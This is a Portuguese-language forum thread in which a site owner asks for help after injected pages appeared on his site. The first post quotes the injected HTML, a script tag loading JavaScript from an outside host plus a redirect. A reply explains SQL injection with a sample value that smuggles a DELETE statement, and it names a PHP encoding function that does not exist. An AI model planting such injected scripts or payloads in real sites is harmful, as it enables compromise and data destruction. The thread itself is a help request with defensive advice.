Sign in to follow this  
matrix2003

Sql Injection

Recommended Posts

pessoal preciso de uma ajuda muito dos brilhantes deste forum tem um engraçadinho dono da www.hostmega.com que esta colocando em meu site em todas as paginas varias paginas tipo default.asp index.asp e outras com o seguinte conteudo

CODE

<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Provedor de Hospedagem de Sites e revenda de hospedagem.</title></head><script type='text/javascript' src='http://www.tce.rn.gov.br/sitenovo/03.js'></script><body></body><script> window.location="http://www.hostmega.com/"; </script>

Sera que existe uma forma de poder parar este engraçadinho e colocando também virus alguém pdoe em dar uma ideia tipo um comando que resolveria o sql acho que é sql pois ele consegui em todas as paginas colocar arquivos paginas o que quizer me ajudem

Share this post


Link to post
Share on other sites

Acho que ele não faz isso manualmente, é o próprio IIS que tem uma configuração pra isso...

Share this post


Link to post
Share on other sites
Guest Rolf Ezequiel
pessoal preciso de uma ajuda muito dos brilhantes deste forum tem um engraçadinho dono da www.hostmega.com que esta colocando em meu site em todas as paginas varias paginas tipo default.asp index.asp e outras com o seguinte conteudo

CODE

<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Provedor de Hospedagem de Sites e revenda de hospedagem.</title></head>&lt;script type='text/javascript' src='http://www.tce.rn.gov.br/sitenovo/03.js'></script><body></body>&lt;script> window.location="http://www.hostmega.com/"; </script>

Sera que existe uma forma de poder parar este engraçadinho e colocando também virus alguém pdoe em dar uma ideia tipo um comando que resolveria o sql acho que é sql pois ele consegui em todas as paginas colocar arquivos paginas o que quizer me ajudem

Matrix2003,

Não creio que seja SQL injection. SQL Injection pode ser evitada incluindo o caractere "escape" da linguagem que você esteja utilizando. Por exemplo, PHP utiliza "\" (barra invertida) para dizer que o próximo caractere faz parte da string. P ex.: "O \"mundo\" é Azul" --> O "mundo" é Azul.

Já o VBasic você precisa fazer o seguinte: "O ""mundo"" é Azul" --> O "mundo" é Azul. A grande sacado do SQL Injection é que ele se utiliza da formação da string para realizar um ataque no Banco de Dados. Os comandos SQL são strings. Quando você tem um campo do tipo string na tabela, e precisa fazer um INSERT, você faz: "INSERT INTO tabela VALUES 'Valor'". Note a aspa simples envolta de "Valor". Imagine que o valor é determinado por uma caixa de texto no formulário. Você faria assim: "INSERT INTO tabela VALUES '" & CAIXATEXTO.Value & "'". Agora é que ocorre o problema. No SQL o delimitador de String é o caractere "'" (Aspa simples). Se você acrescentar na sua CAIXATEXTO o valor {"Valor'; DELETE FROM tabela WHERE campo LIKE '%"} (Sem as chaves), você estaria exectando dois comandos SQL:

INSERT INTO tabela VALUES 'Valor';

DELETE FROM tabela WHERE campo LIKE '%'

Entendido?

No seu caso, o problema é mais simples. Na caixa de texto, o engraçadinho deve estar colocando os caracteres "<" e ">" e quando esse conteúdo é impresso no Site, o browser, logicamente, interpreta como HTML. O que você deve fazer é imprimir no Site o equivalente imprimível de "<" e ">". Se não me falha a memória o comando é o seguinte no PHP: <?php=html_encode(string) ?>. No VBScript tem um comando semelhante que esqueci qual é. Procura na Net por "HTML ENCODE ASP" que você ahca alguma coisa a respeito.

Espero ter ajudado.

Share this post


Link to post
Share on other sites

seu site esta hospedado lá????

entaum mude de host....

pelo jeito não é questão de forms....

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this